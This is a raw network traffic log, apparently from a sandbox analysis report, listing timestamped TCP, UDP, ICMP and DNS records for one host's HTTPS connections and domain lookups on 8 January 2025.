                                                                                                Jan 8, 2025 07:24:01.989887953 CET50062443192.168.2.478.46.22.25
                                                                                                Jan 8, 2025 07:24:01.990056038 CET50062443192.168.2.478.46.22.25
                                                                                                Jan 8, 2025 07:24:01.990056038 CET50062443192.168.2.478.46.22.25
                                                                                                Jan 8, 2025 07:24:01.990068913 CET4435006278.46.22.25192.168.2.4
                                                                                                Jan 8, 2025 07:24:01.990421057 CET50062443192.168.2.478.46.22.25
                                                                                                Jan 8, 2025 07:24:02.000874996 CET4435006578.46.22.25192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.000936985 CET4435006578.46.22.25192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.001224995 CET50065443192.168.2.478.46.22.25
                                                                                                Jan 8, 2025 07:24:02.001241922 CET4435006578.46.22.25192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.001266003 CET50065443192.168.2.478.46.22.25
                                                                                                Jan 8, 2025 07:24:02.001302958 CET50065443192.168.2.478.46.22.25
                                                                                                Jan 8, 2025 07:24:02.005522966 CET4435006478.46.22.25192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.005582094 CET4435006478.46.22.25192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.005688906 CET50064443192.168.2.478.46.22.25
                                                                                                Jan 8, 2025 07:24:02.006679058 CET50064443192.168.2.478.46.22.25
                                                                                                Jan 8, 2025 07:24:02.006688118 CET4435006478.46.22.25192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.022602081 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.023503065 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.023516893 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.024399996 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.024615049 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.024871111 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.024871111 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.024926901 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.069154024 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.069170952 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.115310907 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.394325972 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.394345999 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.394352913 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.394385099 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.394397974 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.394408941 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.394421101 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.394435883 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.394479990 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.394752026 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.395730972 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.395737886 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.395761013 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.395833969 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.395833969 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.395844936 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.397275925 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.487302065 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.487330914 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.487415075 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.487415075 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.487430096 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.487967014 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.488426924 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.488445044 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.488497019 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.488507032 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.488578081 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.488840103 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.490017891 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.490036011 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.490344048 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.490353107 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.490528107 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.538625002 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.538660049 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.538731098 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.538731098 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.538743973 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.538790941 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.579819918 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.579838037 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.579883099 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.579900026 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.579948902 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.579948902 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.580677986 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.580693960 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.580813885 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.580822945 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.581121922 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.581481934 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.581501961 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.581612110 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.581620932 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.581737995 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.582470894 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.582485914 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.582634926 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.582642078 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.582709074 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.583466053 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.583483934 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.583559990 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.583559990 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.583569050 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.583770037 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.584489107 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.584505081 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.584578037 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.584578991 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.584585905 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.584661961 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.627227068 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.627270937 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.627304077 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.627304077 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:02.627765894 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.627856016 CET50066443192.168.2.435.207.98.7
                                                                                                Jan 8, 2025 07:24:02.627876997 CET4435006635.207.98.7192.168.2.4
                                                                                                Jan 8, 2025 07:24:04.280786037 CET50067443192.168.2.4142.250.184.228
                                                                                                Jan 8, 2025 07:24:04.280798912 CET44350067142.250.184.228192.168.2.4
                                                                                                Jan 8, 2025 07:24:04.280870914 CET50067443192.168.2.4142.250.184.228
                                                                                                Jan 8, 2025 07:24:04.281047106 CET50067443192.168.2.4142.250.184.228
                                                                                                Jan 8, 2025 07:24:04.281060934 CET44350067142.250.184.228192.168.2.4
                                                                                                Jan 8, 2025 07:24:04.907614946 CET44350067142.250.184.228192.168.2.4
                                                                                                Jan 8, 2025 07:24:04.907987118 CET50067443192.168.2.4142.250.184.228
                                                                                                Jan 8, 2025 07:24:04.907996893 CET44350067142.250.184.228192.168.2.4
                                                                                                Jan 8, 2025 07:24:04.908973932 CET44350067142.250.184.228192.168.2.4
                                                                                                Jan 8, 2025 07:24:04.909111023 CET50067443192.168.2.4142.250.184.228
                                                                                                Jan 8, 2025 07:24:04.910357952 CET50067443192.168.2.4142.250.184.228
                                                                                                Jan 8, 2025 07:24:04.910423040 CET44350067142.250.184.228192.168.2.4
                                                                                                Jan 8, 2025 07:24:04.959331989 CET50067443192.168.2.4142.250.184.228
                                                                                                Jan 8, 2025 07:24:04.959346056 CET44350067142.250.184.228192.168.2.4
                                                                                                Jan 8, 2025 07:24:05.006112099 CET50067443192.168.2.4142.250.184.228
                                                                                                Jan 8, 2025 07:24:14.832139969 CET44350067142.250.184.228192.168.2.4
                                                                                                Jan 8, 2025 07:24:14.832220078 CET44350067142.250.184.228192.168.2.4
                                                                                                Jan 8, 2025 07:24:14.832427025 CET50067443192.168.2.4142.250.184.228
                                                                                                Jan 8, 2025 07:24:15.084803104 CET50067443192.168.2.4142.250.184.228
                                                                                                Jan 8, 2025 07:24:15.084814072 CET44350067142.250.184.228192.168.2.4
                                                                                                Jan 8, 2025 07:25:04.336451054 CET50077443192.168.2.4142.250.184.228
                                                                                                Jan 8, 2025 07:25:04.336472988 CET44350077142.250.184.228192.168.2.4
                                                                                                Jan 8, 2025 07:25:04.336554050 CET50077443192.168.2.4142.250.184.228
                                                                                                Jan 8, 2025 07:25:04.337042093 CET50077443192.168.2.4142.250.184.228
                                                                                                Jan 8, 2025 07:25:04.337053061 CET44350077142.250.184.228192.168.2.4
                                                                                                Jan 8, 2025 07:25:04.977241039 CET44350077142.250.184.228192.168.2.4
                                                                                                Jan 8, 2025 07:25:04.977535963 CET50077443192.168.2.4142.250.184.228
                                                                                                Jan 8, 2025 07:25:04.977544069 CET44350077142.250.184.228192.168.2.4
                                                                                                Jan 8, 2025 07:25:04.978696108 CET44350077142.250.184.228192.168.2.4
                                                                                                Jan 8, 2025 07:25:04.979123116 CET50077443192.168.2.4142.250.184.228
                                                                                                Jan 8, 2025 07:25:04.979295015 CET44350077142.250.184.228192.168.2.4
                                                                                                Jan 8, 2025 07:25:05.021836042 CET50077443192.168.2.4142.250.184.228
                                                                                                Jan 8, 2025 07:25:07.914011002 CET8049731192.229.221.95192.168.2.4
                                                                                                Jan 8, 2025 07:25:07.914129972 CET4973180192.168.2.4192.229.221.95
                                                                                                Jan 8, 2025 07:25:14.888159037 CET44350077142.250.184.228192.168.2.4
                                                                                                Jan 8, 2025 07:25:14.888256073 CET44350077142.250.184.228192.168.2.4
                                                                                                Jan 8, 2025 07:25:14.888432980 CET50077443192.168.2.4142.250.184.228
                                                                                                Jan 8, 2025 07:25:16.039030075 CET50077443192.168.2.4142.250.184.228
                                                                                                Jan 8, 2025 07:25:16.039063931 CET44350077142.250.184.228192.168.2.4
                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Jan 8, 2025 07:22:34.020617008 CET138138192.168.2.4192.168.2.255
                                                                                                Jan 8, 2025 07:22:34.491801023 CET4921153192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:22:48.013565063 CET53570611.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:48.157514095 CET5339653192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:22:48.158241987 CET6009953192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:22:48.164381027 CET53533961.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:48.165394068 CET53600991.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:48.173989058 CET53572171.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:49.342359066 CET5200853192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:22:49.342479944 CET5683953192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:22:49.343374014 CET5012553192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:22:49.343491077 CET6534453192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:22:49.349060059 CET53520081.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:49.349276066 CET53568391.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:49.349940062 CET53553581.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:49.350059986 CET53501251.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:49.350824118 CET53653441.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:49.433085918 CET53515901.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:50.064474106 CET5919053192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:22:50.064605951 CET5588053192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:22:50.071070910 CET53591901.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:50.071190119 CET53558801.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:50.161546946 CET6117253192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:22:50.161668062 CET5645253192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:22:50.168119907 CET53611721.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:50.168394089 CET53564521.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:50.225662947 CET6346153192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:22:50.225889921 CET5790653192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:22:50.409323931 CET53634611.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:50.424539089 CET53579061.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:50.648672104 CET5913553192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:22:50.699656010 CET4991653192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:22:50.699795008 CET5395753192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:22:50.701184034 CET5156753192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:22:50.701559067 CET6007653192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:22:50.711380005 CET53499161.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:50.711391926 CET53539571.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:50.719023943 CET53515671.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:50.719669104 CET53600761.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:50.744584084 CET53564221.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:51.690506935 CET5070153192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:22:51.690506935 CET5844553192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:22:51.701282978 CET53507011.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:51.722445965 CET53584451.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:51.824261904 CET5324153192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:22:51.824558020 CET5210753192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:22:51.825431108 CET5230253192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:22:51.825431108 CET6206953192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:22:51.837029934 CET53532411.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:51.837696075 CET53521071.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:52.009892941 CET53523021.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:52.015331030 CET53620691.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:52.022789955 CET5971253192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:22:52.023027897 CET5213553192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:22:52.029470921 CET53521351.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:52.029495955 CET53597121.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:53.162127018 CET5959453192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:22:53.162259102 CET5170953192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:22:53.171206951 CET53517091.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:53.174721003 CET53595941.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:22:59.780961990 CET53559241.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:23:04.554780006 CET6416553192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:23:06.504565954 CET53559191.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:23:25.545576096 CET53649451.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:23:47.220521927 CET53545001.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:23:48.344530106 CET53536661.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:23:59.860878944 CET53516111.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:23:59.863122940 CET53514251.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:23:59.875905037 CET5869953192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:23:59.876053095 CET6536353192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:23:59.885267973 CET53653631.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:23:59.908014059 CET53586991.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:23:59.923463106 CET6220853192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:23:59.923626900 CET5530653192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:23:59.935501099 CET53622081.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:23:59.936378956 CET53553061.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:24:00.892338037 CET5736053192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:24:00.892461061 CET6546153192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:24:00.893687963 CET53637931.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:24:00.903264046 CET53654611.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:24:01.047842026 CET53573601.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:24:01.172194958 CET6517353192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:24:01.172348022 CET5520253192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:24:01.183765888 CET53651731.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:24:01.189805984 CET53552021.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:24:04.273225069 CET5697553192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:24:04.273432970 CET5414453192.168.2.41.1.1.1
                                                                                                Jan 8, 2025 07:24:04.279654980 CET53569751.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:24:04.279956102 CET53541441.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:24:09.281548977 CET53499771.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:24:17.905281067 CET53570831.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:24:36.686794043 CET53598781.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:24:59.295305967 CET53532431.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:24:59.547015905 CET53595261.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:25:28.922540903 CET53605011.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:26:13.046484947 CET53522131.1.1.1192.168.2.4
                                                                                                Jan 8, 2025 07:26:34.655776024 CET138138192.168.2.4192.168.2.255
                                                                                                TimestampSource IPDest IPChecksumCodeType
                                                                                                Jan 8, 2025 07:22:51.722640038 CET192.168.2.41.1.1.1c225(Port unreachable)Destination Unreachable
                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Jan 8, 2025 07:22:34.491801023 CET192.168.2.41.1.1.10xa5ccStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:48.157514095 CET192.168.2.41.1.1.10x2c1fStandard query (0)ucarecdn.comA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:48.158241987 CET192.168.2.41.1.1.10x28bbStandard query (0)ucarecdn.com65IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:49.342359066 CET192.168.2.41.1.1.10x6e25Standard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:49.342479944 CET192.168.2.41.1.1.10x8d62Standard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:49.343374014 CET192.168.2.41.1.1.10x21e4Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:49.343491077 CET192.168.2.41.1.1.10xba6dStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:50.064474106 CET192.168.2.41.1.1.10x6846Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:50.064605951 CET192.168.2.41.1.1.10x3c2eStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:50.161546946 CET192.168.2.41.1.1.10x97a7Standard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:50.161668062 CET192.168.2.41.1.1.10x5d4dStandard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:50.225662947 CET192.168.2.41.1.1.10x9d76Standard query (0)help.lafayette.eduA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:50.225889921 CET192.168.2.41.1.1.10x8c29Standard query (0)help.lafayette.edu65IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:50.648672104 CET192.168.2.41.1.1.10xe58dStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:50.699656010 CET192.168.2.41.1.1.10x83cfStandard query (0)www.freepnglogos.comA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:50.699795008 CET192.168.2.41.1.1.10xc82eStandard query (0)www.freepnglogos.com65IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:50.701184034 CET192.168.2.41.1.1.10xfe56Standard query (0)publishingblog.chA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:50.701559067 CET192.168.2.41.1.1.10x4c92Standard query (0)publishingblog.ch65IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:51.690506935 CET192.168.2.41.1.1.10xa3f5Standard query (0)www.freepnglogos.comA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:51.690506935 CET192.168.2.41.1.1.10x7ee9Standard query (0)www.freepnglogos.com65IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:51.824261904 CET192.168.2.41.1.1.10xa804Standard query (0)publishing.blogA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:51.824558020 CET192.168.2.41.1.1.10xe5e2Standard query (0)publishing.blog65IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:51.825431108 CET192.168.2.41.1.1.10xc37dStandard query (0)help.lafayette.eduA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:51.825431108 CET192.168.2.41.1.1.10x7055Standard query (0)help.lafayette.edu65IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:52.022789955 CET192.168.2.41.1.1.10x8fc2Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:52.023027897 CET192.168.2.41.1.1.10x11faStandard query (0)www.google.com65IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:53.162127018 CET192.168.2.41.1.1.10x375aStandard query (0)publishing.blogA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:53.162259102 CET192.168.2.41.1.1.10x6d1Standard query (0)publishing.blog65IN (0x0001)false
                                                                                                Jan 8, 2025 07:23:04.554780006 CET192.168.2.41.1.1.10xdeaaStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:23:59.875905037 CET192.168.2.41.1.1.10x12d3Standard query (0)www.freepnglogos.comA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:23:59.876053095 CET192.168.2.41.1.1.10x57adStandard query (0)www.freepnglogos.com65IN (0x0001)false
                                                                                                Jan 8, 2025 07:23:59.923463106 CET192.168.2.41.1.1.10xfdceStandard query (0)publishing.blogA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:23:59.923626900 CET192.168.2.41.1.1.10x5710Standard query (0)publishing.blog65IN (0x0001)false
                                                                                                Jan 8, 2025 07:24:00.892338037 CET192.168.2.41.1.1.10x12d9Standard query (0)www.freepnglogos.comA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:24:00.892461061 CET192.168.2.41.1.1.10x2cf8Standard query (0)www.freepnglogos.com65IN (0x0001)false
                                                                                                Jan 8, 2025 07:24:01.172194958 CET192.168.2.41.1.1.10x440cStandard query (0)publishing.blogA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:24:01.172348022 CET192.168.2.41.1.1.10xc8c2Standard query (0)publishing.blog65IN (0x0001)false
                                                                                                Jan 8, 2025 07:24:04.273225069 CET192.168.2.41.1.1.10x32e8Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:24:04.273432970 CET192.168.2.41.1.1.10x84d8Standard query (0)www.google.com65IN (0x0001)false
                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Jan 8, 2025 07:22:34.498663902 CET1.1.1.1192.168.2.40xa5ccNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:48.164381027 CET1.1.1.1192.168.2.40x2c1fNo error (0)ucarecdn.com151.101.2.132A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:48.164381027 CET1.1.1.1192.168.2.40x2c1fNo error (0)ucarecdn.com151.101.130.132A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:48.164381027 CET1.1.1.1192.168.2.40x2c1fNo error (0)ucarecdn.com151.101.194.132A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:48.164381027 CET1.1.1.1192.168.2.40x2c1fNo error (0)ucarecdn.com151.101.66.132A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:49.349060059 CET1.1.1.1192.168.2.40x6e25No error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:49.349060059 CET1.1.1.1192.168.2.40x6e25No error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:49.349276066 CET1.1.1.1192.168.2.40x8d62No error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                Jan 8, 2025 07:22:49.350059986 CET1.1.1.1192.168.2.40x21e4No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
